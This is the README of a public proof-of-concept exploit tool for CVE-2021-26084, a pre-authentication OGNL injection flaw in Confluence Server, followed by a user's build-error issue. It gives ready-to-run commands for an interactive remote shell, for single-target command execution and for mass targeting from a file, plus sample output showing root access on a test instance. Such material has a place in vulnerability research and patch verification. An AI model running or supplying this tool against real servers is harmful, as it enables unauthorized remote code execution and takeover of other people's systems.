CVE-2021-26084 - Confluence Server Webwork OGNL injection (Pre-Auth RCE)

CVE-2021-26084

Proof of concept for CVE-2021-26084.

Confluence Server Webwork OGNL injection (Pre-Auth RCE)

Disclaimer

This is for educational purposes only. I am not responsible for your actions. Use at your own discretion.

Command Limitations

Due to the payload, it is not possible to pass some characters. The list below is what I've found during my testing.

  • Double quotations "
  • Vertical bar |

Interactive Shell

go run exploit.go -t <target> -i

Example

[email protected]:/# go run exploit.go -t http://localhost:8090 -i
CVE-2021-26084 - Confluence Server Webwork OGNL injection
Made by Tay (https://github.com/taythebot)
time="2021-09-02T00:29:37+09:00" level=info msg="Checking if https://localhost:8090 is vulnerable"
time="2021-09-02T00:29:39+09:00" level=info msg="Target https://localhost:8090 is vulnerable"
[email protected]:/# whoami
root
[email protected]:/# exit
Exiting interactive mode, goodbye

  • Only works on a single target
  • Type exit to exit the interactive shell
  • A notice is shown if the target is possibly a Windows machine

Single Target

go run exploit.go -t <target> -c <command>

Multiple Targets

go run exploit.go -f <file> -c <command>

Build

go mod download
go build exploit.go

Issues

  • Error ./exploit.go:154:15: undefined: io.ReadAll

    Hi, I am getting an error when trying to execute: command-line-arguments ./exploit.go:154:15: undefined: io.ReadAll

    Any idea what is happening? Tried on 2 different machines with 2 different versions of go installed.

    opened by wiktorw767 0
Owner
Tay
Fullstack developer focusing on Go and Javascript. I sometimes write PHP in shame...